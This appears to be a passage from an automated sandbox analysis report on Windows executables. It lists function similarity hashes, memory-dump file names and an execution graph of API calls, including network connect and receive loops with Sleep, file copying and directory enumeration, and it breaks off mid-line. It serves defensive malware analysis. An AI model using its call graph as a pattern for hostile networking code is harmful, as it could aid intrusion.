                  • Instruction ID: c0628115c0cdff1e14157074193475bb29aba1e752ebbcec768041386d5fb495
                  • Opcode Fuzzy Hash: eb184aebe725f6c31738ef2dd5e8f3b42b676bc68a3f698a16aca6e6f7ce1523
                  • Instruction Fuzzy Hash: AD117362908E84C2D6119F1DE0413EAB370FF9A359F505326EBC816364DF3AD152CB00
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4064033741
                  • Opcode ID: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                  • Instruction ID: 9b72368a28b92044cb128bd8e9c870a4f4d05fab9de360c31b8efe303874e73d
                  • Opcode Fuzzy Hash: 61c76801d709749aa9f8a6a9a4260049e065b685215aedcdc6761c85533db195
                  • Instruction Fuzzy Hash: C5F01D66808F84C2D6119F19E4402ABB370FF9E789F605327EBC926665DF2DD542CB10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2713391170
                  • Opcode ID: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                  • Instruction ID: c00a5ce81d7d4775460beb195b4dd8c8f45122230e6093657ccbdd0ad566e119
                  • Opcode Fuzzy Hash: 0898788bb1916c83e4039a5ab0167b2e3a86215b5e3d392d65df68120d82ac9e
                  • Instruction Fuzzy Hash: 79F01D66808F84C2D6119F19E4402ABF370FF9E789F605327EBC926665DF2DD546CB10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2187435201
                  • Opcode ID: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                  • Instruction ID: db2476cab303480e3135a4c7cf0be770779b9105d7e8db5e44387fbfbcaab444
                  • Opcode Fuzzy Hash: a62f7440f3da8faac09ae7ec79a5f8cc0f8ffb060ae32dd71dd6362f98a5d4bc
                  • Instruction Fuzzy Hash: E3F01D66808F84C2D6119F19E4802ABB370FF9E789F606327EBC926665DF3DD542CB10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4273532761
                  • Opcode ID: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                  • Instruction ID: bac73c1e986576231aad4c2760161a4887bec97755052f1ac6df457b2e988025
                  • Opcode Fuzzy Hash: 13a3b1830272570e6661193a87d44eff3ce7335499efeae423e896c0a233d03e
                  • Instruction Fuzzy Hash: 02F01D66808F84C2D6119F19E4402ABB370FF9E789F605327EBC926664DF2DD542CB10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-4283191376
                  • Opcode ID: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                  • Instruction ID: c0d65386f009d00f39b4522b1f18f8d6048cc9c81a0523d8832d3c95c92612dd
                  • Opcode Fuzzy Hash: bfc60d37ca9a6988f5593f672af36c5057a585c8f9be36fa9b4a9f9ad44e5480
                  • Instruction Fuzzy Hash: 86F01D66808F84C2D6119F19E4402ABB370FF9E789F605327EBC926664DF2DD542CB10
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 00000005.00000002.1697438099.00007FF764CC1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF764CC0000, based on PE: true
                  • Associated: 00000005.00000002.1697423841.00007FF764CC0000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697520847.00007FF764CD1000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697535107.00007FF764CD2000.00000002.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697549735.00007FF764CDA000.00000004.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697563189.00007FF764CDC000.00000008.00000001.01000000.00000004.sdmpDownload File
                  • Associated: 00000005.00000002.1697575542.00007FF764CDF000.00000002.00000001.01000000.00000004.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_5_2_7ff764cc0000_w8m7wmyk939oczmkw4o2h16hs.jbxd
                  Similarity
                  • API ID: fprintf
                  • String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                  • API String ID: 383729395-2468659920
                  • Opcode ID: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                  • Instruction ID: e42ef280db02da806872f6d116db7b40e47f82fb88522b190aaa0d9fc25d1318
                  • Opcode Fuzzy Hash: 1e66a750eef62416fe29ac226196076c421e718d702112074ece5bc511332d35
                  • Instruction Fuzzy Hash: A2F01966808F8482D6119F19E4402ABB370FF9E789F605327EFC82A625DF2DD542CB00
                  Memory Dump Source
                  • Source File: 0000000A.00000002.1922981698.00007FF679A51000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF679A50000, based on PE: true
                  • Associated: 0000000A.00000002.1922964275.00007FF679A50000.00000002.00000001.01000000.00000006.sdmpDownload File
                  • Associated: 0000000A.00000002.1923002401.00007FF679A60000.00000004.00000001.01000000.00000006.sdmpDownload File
                  • Associated: 0000000A.00000002.1923002401.00007FF67A05C000.00000004.00000001.01000000.00000006.sdmpDownload File
                  • Associated: 0000000A.00000002.1923002401.00007FF67A05E000.00000004.00000001.01000000.00000006.sdmpDownload File
                  • Associated: 0000000A.00000002.1923836547.00007FF67A475000.00000002.00000001.01000000.00000006.sdmpDownload File
                  • Associated: 0000000A.00000002.1923859862.00007FF67A47D000.00000004.00000001.01000000.00000006.sdmpDownload File
                  • Associated: 0000000A.00000002.1923859862.00007FF67A47F000.00000004.00000001.01000000.00000006.sdmpDownload File
                  • Associated: 0000000A.00000002.1923932950.00007FF67A480000.00000008.00000001.01000000.00000006.sdmpDownload File
                  • Associated: 0000000A.00000002.1923951231.00007FF67A483000.00000002.00000001.01000000.00000006.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_10_2_7ff679a50000_nju2apmx83wqd9u7namsf59y.jbxd
                  Similarity
                  • API ID:
                  • String ID:
                  • API String ID:
                  • Opcode ID: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                  • Instruction ID: ed4072b0d5226e39f7348ab5e04bdd638bdaec0d3c54ad25ecefdd5279ae14f5
                  • Opcode Fuzzy Hash: d92b2e36e32e242d3d26627d8420fc34f18325cbf1fffa5b1655a556a0966707
                  • Instruction Fuzzy Hash: 0CB01233B2528284E3007F02E84167C36607B04700F510070C40C83366CE7D90804710

                  Execution Graph

                  Execution Coverage:5.7%
                  Dynamic/Decrypted Code Coverage:0%
                  Signature Coverage:2.5%
                  Total number of Nodes:2000
                  Total number of Limit Nodes:20
                  execution_graph 43246 7ffe1150184a 43247 7ffe11501855 43246->43247 43248 7ffe1150195e 43247->43248 43250 7ffe1150187d Sleep 43247->43250 43253 7ffe115022d5 10 API calls 43247->43253 43255 7ffe11501932 Sleep 43247->43255 43257 7ffe1150191e memcpy 43247->43257 43258 7ffe1150256c socket 43247->43258 43293 7ffe11502a1a 43247->43293 43304 7ffe11501780 43247->43304 43252 7ffe1150196b 43248->43252 43313 7ffe115022d5 10 API calls 43248->43313 43250->43247 43253->43247 43255->43247 43257->43247 43259 7ffe1150276b WSAGetLastError 43258->43259 43260 7ffe115025a3 43258->43260 43261 7ffe11501292 6 API calls 43259->43261 43262 7ffe115025a7 43260->43262 43263 7ffe115025c5 43260->43263 43265 7ffe1150278f 43261->43265 43314 7ffe11502209 43262->43314 43266 7ffe11502209 8 API calls 43263->43266 43268 7ffe11502799 43265->43268 43269 7ffe115025df 43265->43269 43270 7ffe115025c3 43266->43270 43331 7ffe11501292 43268->43331 43274 7ffe11501292 6 API calls 43269->43274 43273 7ffe115025d7 43270->43273 43327 7ffe1150233a setsockopt 43270->43327 43271 7ffe1150261e 43271->43273 43275 7ffe11502623 htonl htons connect 43271->43275 43342 7ffe115022d5 10 API calls 43273->43342 43277 7ffe11502600 43274->43277 43280 7ffe1150267c WSAGetLastError 43275->43280 43281 7ffe11502661 43275->43281 43277->43247 43283 7ffe1150268d 43280->43283 43284 7ffe1150273e WSAGetLastError 43280->43284 43282 7ffe11502209 8 API calls 43281->43282 43286 7ffe1150266e 43282->43286 43283->43273 43287 7ffe11502695 select 43283->43287 43285 7ffe11501292 6 API calls 43284->43285 43285->43273 43286->43265 43286->43273 43288 7ffe115026f6 43287->43288 43289 7ffe11502720 43287->43289 43288->43281 43290 7ffe115026fc WSAGetLastError 43288->43290 43291 7ffe11501292 6 API calls 43289->43291 43292 7ffe11501292 6 API calls 43290->43292 43291->43273 43292->43273 43294 7ffe11502aa8 43293->43294 43295 7ffe11502a34 43293->43295 43296 7ffe11501292 6 API calls 43294->43296 43295->43294 43297 7ffe11502a39 recv 43295->43297 43303 7ffe11502a53 43296->43303 43298 7ffe11502a5c WSAGetLastError 43297->43298 43299 7ffe11502a4f 43297->43299 43300 7ffe11502a70 43298->43300 43298->43303 43302 7ffe11501292 6 API calls 43299->43302 43299->43303 43301 7ffe11501292 6 API calls 43300->43301 43301->43303 43302->43303 43303->43247 43305 7ffe11501798 43304->43305 43306 7ffe11501842 43304->43306 43305->43306 43351 7ffe11509540 43305->43351 43306->43247 43309 7ffe11501834 LeaveCriticalSection 43309->43306 43310 7ffe115017c8 43310->43309 43311 7ffe11501292 6 API calls 43310->43311 43354 7ffe1150a8a0 43310->43354 43311->43310 43313->43252 43315 7ffe11502219 ioctlsocket 43314->43315 43317 7ffe1150224d WSAGetLastError 43315->43317 43318 7ffe1150223c 43315->43318 43319 7ffe11501292 6 API calls 43317->43319 43318->43271 43320 7ffe11502154 setsockopt 43318->43320 43319->43318 43321 7ffe11502189 setsockopt 43320->43321 43322 7ffe115021e4 WSAGetLastError 43320->43322 43323 7ffe115021b5 43321->43323 43324 7ffe115021bf WSAGetLastError 43321->43324 43325 7ffe11501292 6 API calls 43322->43325 43323->43270 43326 7ffe11501292 6 API calls 43324->43326 43325->43323 43326->43323 43328 7ffe11502377 43327->43328 43329 7ffe11502381 WSAGetLastError 43327->43329 43328->43271 43330 7ffe11501292 6 API calls 43329->43330 43330->43328 43332 7ffe115012a0 43331->43332 43343 7ffe1150d670 43332->43343 43335 7ffe1150135c EnterCriticalSection 43338 7ffe11501376 LeaveCriticalSection 43335->43338 43339 7ffe11501393 43335->43339 43336 7ffe11501327 fwrite fflush 43337 7ffe11501350 43336->43337 43337->43277 43338->43336 43340 7ffe115013cd CopyFileA 43339->43340 43341 7ffe11501405 43340->43341 43341->43338 43342->43269 43344 7ffe1150d67e 43343->43344 43345 7ffe1150d695 43343->43345 43349 7ffe1150e6ab fputc 43344->43349 43350 7ffe1150e6ab fputc 43345->43350 43348 7ffe115012f9 43348->43335 43348->43336 43348->43337 43349->43348 43350->43348 43352 7ffe11509556 GetSystemTimeAsFileTime 43351->43352 43353 7ffe115017ab EnterCriticalSection 43351->43353 43352->43353 43353->43310 43355 7ffe1150a8cc 43354->43355 43360 7ffe1150a8eb 43354->43360 43356 7ffe1150a8d6 43355->43356 43357 7ffe1150a909 43355->43357 43359 7ffe1150a8d8 43356->43359 43363 7ffe1150a8f4 43356->43363 43373 7ffe1150a50f 23 API calls 43357->43373 43361 7ffe1150a8df 43359->43361 43362 7ffe1150a902 43359->43362 43360->43310 43361->43360 43371 7ffe1150a639 45 API calls 43361->43371 43372 7ffe1150a2b0 25 API calls 43362->43372 43363->43360 43368 7ffe1150a2a2 43363->43368 43367 7ffe1150a907 43367->43360 43374 7ffe1150a060 43368->43374 43371->43360 43372->43367 43373->43360 43403 7ffe11502eab 43374->43403 43381 7ffe1150a0f2 strlen 43383 7ffe1150a11f strlen 43381->43383 43384 7ffe1150a109 43381->43384 43382 7ffe1150a1e9 43396 7ffe1150a26b 43382->43396 43398 7ffe1150a087 43382->43398 43451 7ffe11504013 43382->43451 43476 7ffe1150afb7 38 API calls 43382->43476 43477 7ffe1150a9e0 21 API calls 43382->43477 43478 7ffe1150ab69 66 API calls 43382->43478 43423 7ffe115066c9 43383->43423 43384->43383 43386 7ffe1150a10e strlen 43384->43386 43386->43383 43388 7ffe1150a151 43390 7ffe1150a159 strlen 43388->43390 43388->43398 43393 7ffe1150a170 43390->43393 43394 7ffe1150a186 strcpy strlen strlen strlen 43390->43394 43393->43394 43397 7ffe1150a175 strlen 43393->43397 43394->43382 43395 7ffe1150a277 43395->43398 43399 7ffe11502eab 2 API calls 43395->43399 43479 7ffe11503ff8 FindClose 43396->43479 43397->43394 43398->43360 43399->43398 43404 7ffe11502eb6 43403->43404 43405 7ffe11502ec1 QueryPerformanceFrequency QueryPerformanceCounter 43403->43405 43404->43398 43406 7ffe11509cc0 GetModuleHandleExA 43404->43406 43405->43404 43407 7ffe11509cf2 GetLastError 43406->43407 43408 7ffe11509ce8 43406->43408 43409 7ffe11501292 6 API calls 43407->43409 43410 7ffe11506dd1 43408->43410 43409->43408 43411 7ffe11506e18 43410->43411 43412 7ffe11506de2 43410->43412 43413 7ffe11501292 6 API calls 43411->43413 43414 7ffe11506e48 43412->43414 43415 7ffe11506de7 43412->43415 43421 7ffe11506dfd 43413->43421 43416 7ffe11501292 6 API calls 43414->43416 43417 7ffe11506e78 43415->43417 43418 7ffe11506df0 43415->43418 43416->43421 43419 7ffe11501292 6 API calls 43417->43419 43480 7ffe11506c92 8 API calls 43418->43480 43419->43421 43421->43381 43421->43382 43422 7ffe11506df5 43422->43421 43424 7ffe115066e7 43423->43424 43425 7ffe115066d2 GetFileAttributesA 43423->43425 43427 7ffe11501292 6 API calls 43424->43427 43426 7ffe11506717 GetLastError 43425->43426 43428 7ffe115066dd 43425->43428 43426->43428 43427->43428 43428->43388 43429 7ffe115042be 43428->43429 43430 7ffe115042dd strlen 43429->43430 43431 7ffe11504318 43429->43431 43432 7ffe115042ee 43430->43432 43448 7ffe11504309 43430->43448 43433 7ffe11501292 6 API calls 43431->43433 43434 7ffe115042f7 CreateDirectoryA 43432->43434 43435 7ffe11504396 strcpy strlen 43432->43435 43433->43448 43437 7ffe11504350 GetLastError 43434->43437 43434->43448 43436 7ffe115043ce strlen 43435->43436 43442 7ffe11504375 43435->43442 43436->43442 43438 7ffe11501292 6 API calls 43437->43438 43438->43442 43439 7ffe11504509 43445 7ffe11501292 6 API calls 43439->43445 43440 7ffe11504580 43443 7ffe11501292 6 API calls 43440->43443 43441 7ffe115043bd strlen 43441->43436 43442->43435 43442->43436 43442->43441 43446 7ffe1150443a CreateDirectoryA 43442->43446 43442->43448 43444 7ffe11504532 43443->43444 43444->43388 43445->43444 43447 7ffe11504451 GetLastError 43446->43447 43450 7ffe115043e5 43446->43450 43447->43450 43448->43439 43448->43440 43449 7ffe11501292 6 API calls 43449->43450 43450->43442 43450->43449 43452 7ffe11504033 43451->43452 43470 7ffe11504079 43451->43470 43453 7ffe1150403c 43452->43453 43454 7ffe115040d2 43452->43454 43457 7ffe1150410a 43453->43457 43458 7ffe11504045 43453->43458 43456 7ffe11501292 6 API calls 43454->43456 43455 7ffe11501292 6 API calls 43475 7ffe115040c3 43455->43475 43456->43475 43459 7ffe11501292 6 API calls 43457->43459 43460 7ffe11504142 FindFirstFileA 43458->43460 43461 7ffe11504051 FindNextFileA 43458->43461 43459->43475 43462 7ffe11504156 43460->43462 43463 7ffe11504163 GetLastError 43460->43463 43464 7ffe11504067 43461->43464 43465 7ffe11504192 GetLastError 43461->43465 43466 7ffe1150406c strcpy 43462->43466 43467 7ffe11504177 43463->43467 43473 7ffe11504170 43463->43473 43464->43466 43468 7ffe115041bb 43465->43468 43465->43473 43466->43470 43472 7ffe11501292 6 API calls 43467->43472 43471 7ffe11501292 6 API calls 43468->43471 43469 7ffe115041ad FindClose 43469->43470 43470->43455 43470->43475 43471->43473 43472->43473 43473->43469 43473->43470 43474 7ffe115041d8 43473->43474 43474->43382 43475->43382 43476->43382 43477->43382 43478->43382 43479->43395 43480->43422 43481 7ffe11ec364a 43490 7ffe11ec3655 43481->43490 43482 7ffe11ec375e 43483 7ffe11ec376b 43482->43483 43540 7ffe11ec2415 10 API calls 43482->43540 43486 7ffe11ec367d Sleep 43486->43490 43488 7ffe11ec2415 10 API calls 43488->43490 43489 7ffe11ec3732 Sleep 43489->43490 43490->43482 43490->43486 43490->43488 43490->43489 43492 7ffe11ec371e memcpy 43490->43492 43493 7ffe11ec26ac socket 43490->43493 43528 7ffe11ec2b5a 43490->43528 43539 7ffe11ec3580 9 API calls 43490->43539 43492->43490 43494 7ffe11ec28ab WSAGetLastError 43493->43494 43495 7ffe11ec26e3 43493->43495 43498 7ffe11ec2fd2 6 API calls 43494->43498 43496 7ffe11ec26e7 43495->43496 43497 7ffe11ec2705 43495->43497 43541 7ffe11ec2349 43496->43541 43501 7ffe11ec2349 8 API calls 43497->43501 43500 7ffe11ec28cf 43498->43500 43504 7ffe11ec28d9 43500->43504 43505 7ffe11ec271f 43500->43505 43502 7ffe11ec2703 43501->43502 43507 7ffe11ec2717 43502->43507 43554 7ffe11ec247a setsockopt 43502->43554 43558 7ffe11ec2fd2 43504->43558 43508 7ffe11ec2fd2 6 API calls 43505->43508 43569 7ffe11ec2415 10 API calls 43507->43569 43510 7ffe11ec2740 43508->43510 43509 7ffe11ec275e 43509->43507 43513 7ffe11ec2763 htonl htons connect 43509->43513 43510->43490 43515 7ffe11ec27bc WSAGetLastError 43513->43515 43516 7ffe11ec27a1 43513->43516 43517 7ffe11ec27cd 43515->43517 43518 7ffe11ec287e WSAGetLastError 43515->43518 43519 7ffe11ec2349 8 API calls 43516->43519 43517->43507 43520 7ffe11ec27d5 select 43517->43520 43521 7ffe11ec2fd2 6 API calls 43518->43521 43522 7ffe11ec27ae 43519->43522 43523 7ffe11ec2836 43520->43523 43524 7ffe11ec2860 43520->43524 43521->43507 43522->43500 43522->43507 43523->43516 43525 7ffe11ec283c WSAGetLastError 43523->43525 43526 7ffe11ec2fd2 6 API calls 43524->43526 43527 7ffe11ec2fd2 6 API calls 43525->43527 43526->43507 43527->43507 43529 7ffe11ec2be8 43528->43529 43530 7ffe11ec2b74 43528->43530 43531 7ffe11ec2fd2 6 API calls 43529->43531 43530->43529 43532 7ffe11ec2b79 recv 43530->43532 43535 7ffe11ec2b93 43531->43535 43533 7ffe11ec2b9c WSAGetLastError 43532->43533 43536 7ffe11ec2b8f 43532->43536 43534 7ffe11ec2bb0 43533->43534 43533->43535 43537 7ffe11ec2fd2 6 API calls 43534->43537 43535->43490 43536->43535 43538 7ffe11ec2fd2 6 API calls 43536->43538 43537->43535 43538->43535 43539->43490 43540->43483 43542 7ffe11ec2359 ioctlsocket 43541->43542 43544 7ffe11ec238d WSAGetLastError 43542->43544 43545 7ffe11ec237c 43542->43545 43546 7ffe11ec2fd2 6 API calls 43544->43546 43545->43509 43547 7ffe11ec2294 setsockopt 43545->43547 43546->43545 43548 7ffe11ec22c9 setsockopt 43547->43548 43549 7ffe11ec2324 WSAGetLastError 43547->43549 43550 7ffe11ec22ff WSAGetLastError 43548->43550 43552 7ffe11ec22f5 43548->43552 43551 7ffe11ec2fd2 6 API calls 43549->43551 43553 7ffe11ec2fd2 6 API calls 43550->43553 43551->43552 43552->43502 43553->43552 43555 7ffe11ec24b7 43554->43555 43556 7ffe11ec24c1 WSAGetLastError 43554->43556 43555->43509 43557 7ffe11ec2fd2 6 API calls 43556->43557 43557->43555 43559 7ffe11ec2fe0 43558->43559 43570 7ffe11ecd190 43559->43570 43562 7ffe11ec3090 43562->43510 43563 7ffe11ec3067 fwrite fflush 43563->43562 43564 7ffe11ec309c EnterCriticalSection 43565 7ffe11ec30b6 LeaveCriticalSection 43564->43565 43566 7ffe11ec30d3 43564->43566 43565->43563 43567 7ffe11ec310d CopyFileA 43566->43567 43568 7ffe11ec3145 43567->43568 43568->43565 43569->43505 43571 7ffe11ecd1b5 43570->43571 43572 7ffe11ecd19e 43570->43572 43577 7ffe11ece1cb fputc 43571->43577 43576 7ffe11ece1cb fputc 43572->43576 43575 7ffe11ec3039 43575->43562 43575->43563 43575->43564 43576->43575 43577->43575 43578 7ffe0eb4ef2a 43586 7ffe0eb4ef35 43578->43586 43579 7ffe0eb4f03e 43580 7ffe0eb4f04b 43579->43580 43645 7ffe0eb44e55 20 API calls 43579->43645 43583 7ffe0eb4ef5d Sleep 43583->43586 43584 7ffe0eb44e55 20 API calls 43584->43586 43586->43579 43586->43583 43586->43584 43587 7ffe0eb4f012 Sleep 43586->43587 43589 7ffe0eb4effe memcpy 43586->43589 43590 7ffe0eb450ec socket 43586->43590 43625 7ffe0eb4559a 43586->43625 43636 7ffe0eb4ee60 43586->43636 43587->43586 43589->43586 43591 7ffe0eb45123 43590->43591 43592 7ffe0eb452eb WSAGetLastError 43590->43592 43593 7ffe0eb45145 43591->43593 43594 7ffe0eb45127 43591->43594 43595 7ffe0eb41292 16 API calls 43592->43595 43598 7ffe0eb44d89 18 API calls 43593->43598 43646 7ffe0eb44d89 43594->43646 43597 7ffe0eb4530f 43595->43597 43600 7ffe0eb45319 43597->43600 43601 7ffe0eb4515f 43597->43601 43602 7ffe0eb45143 43598->43602 43663 7ffe0eb41292 43600->43663 43603 7ffe0eb41292 16 API calls 43601->43603 43619 7ffe0eb45157 43602->43619 43659 7ffe0eb44eba setsockopt 43602->43659 43606 7ffe0eb45180 43603->43606 43604 7ffe0eb4519e 43608 7ffe0eb451a3 htonl htons connect 43604->43608 43604->43619 43606->43586 43611 7ffe0eb451e1 43608->43611 43612 7ffe0eb451fc WSAGetLastError 43608->43612 43613 7ffe0eb44d89 18 API calls 43611->43613 43614 7ffe0eb452be WSAGetLastError 43612->43614 43615 7ffe0eb4520d 43612->43615 43617 7ffe0eb451ee 43613->43617 43616 7ffe0eb41292 16 API calls 43614->43616 43618 7ffe0eb45215 select 43615->43618 43615->43619 43616->43619 43617->43597 43617->43619 43620 7ffe0eb452a0 43618->43620 43621 7ffe0eb45276 43618->43621 43674 7ffe0eb44e55 20 API calls 43619->43674 43623 7ffe0eb41292 16 API calls 43620->43623 43621->43611 43622 7ffe0eb4527c WSAGetLastError 43621->43622 43624 7ffe0eb41292 16 API calls 43622->43624 43623->43619 43624->43619 43626 7ffe0eb455b4 43625->43626 43627 7ffe0eb45628 43625->43627 43626->43627 43629 7ffe0eb455b9 recv 43626->43629 43628 7ffe0eb41292 16 API calls 43627->43628 43635 7ffe0eb455d3 43628->43635 43630 7ffe0eb455cf 43629->43630 43631 7ffe0eb455dc WSAGetLastError 43629->43631 43633 7ffe0eb41292 16 API calls 43630->43633 43630->43635 43632 7ffe0eb455f0 43631->43632 43631->43635 43634 7ffe0eb41292 16 API calls 43632->43634 43633->43635 43634->43635 43635->43586 43637 7ffe0eb4ef22 43636->43637 43638 7ffe0eb4ee78 43636->43638 43637->43586 43638->43637 43683 7ffe0eb47cc0 43638->43683 43641 7ffe0eb4ef14 LeaveCriticalSection 43641->43637 43642 7ffe0eb4eea8 43642->43641 43643 7ffe0eb41292 16 API calls 43642->43643 43686 7ffe0eb500aa 43642->43686 43643->43642 43645->43580 43647 7ffe0eb44d99 ioctlsocket 43646->43647 43649 7ffe0eb44dcd WSAGetLastError 43647->43649 43651 7ffe0eb44dbc 43647->43651 43650 7ffe0eb41292 16 API calls 43649->43650 43650->43651 43651->43604 43652 7ffe0eb44cd4 setsockopt 43651->43652 43653 7ffe0eb44d64 WSAGetLastError 43652->43653 43654 7ffe0eb44d09 setsockopt 43652->43654 43657 7ffe0eb41292 16 API calls 43653->43657 43655 7ffe0eb44d3f WSAGetLastError 43654->43655 43656 7ffe0eb44d35 43654->43656 43658 7ffe0eb41292 16 API calls 43655->43658 43656->43602 43657->43656 43658->43656 43660 7ffe0eb44f01 WSAGetLastError 43659->43660 43661 7ffe0eb44ef7 43659->43661 43662 7ffe0eb41292 16 API calls 43660->43662 43661->43604 43662->43661 43664 7ffe0eb412a0 43663->43664 43675 7ffe0eb50c10 43664->43675 43667 7ffe0eb41327 fwrite fflush 43670 7ffe0eb41350 43667->43670 43668 7ffe0eb4135c EnterCriticalSection 43669 7ffe0eb41376 LeaveCriticalSection 43668->43669 43671 7ffe0eb41393 43668->43671 43669->43667 43670->43606 43672 7ffe0eb413cd CopyFileA 43671->43672 43673 7ffe0eb41405 43672->43673 43673->43669 43674->43601 43676 7ffe0eb50c35 43675->43676 43677 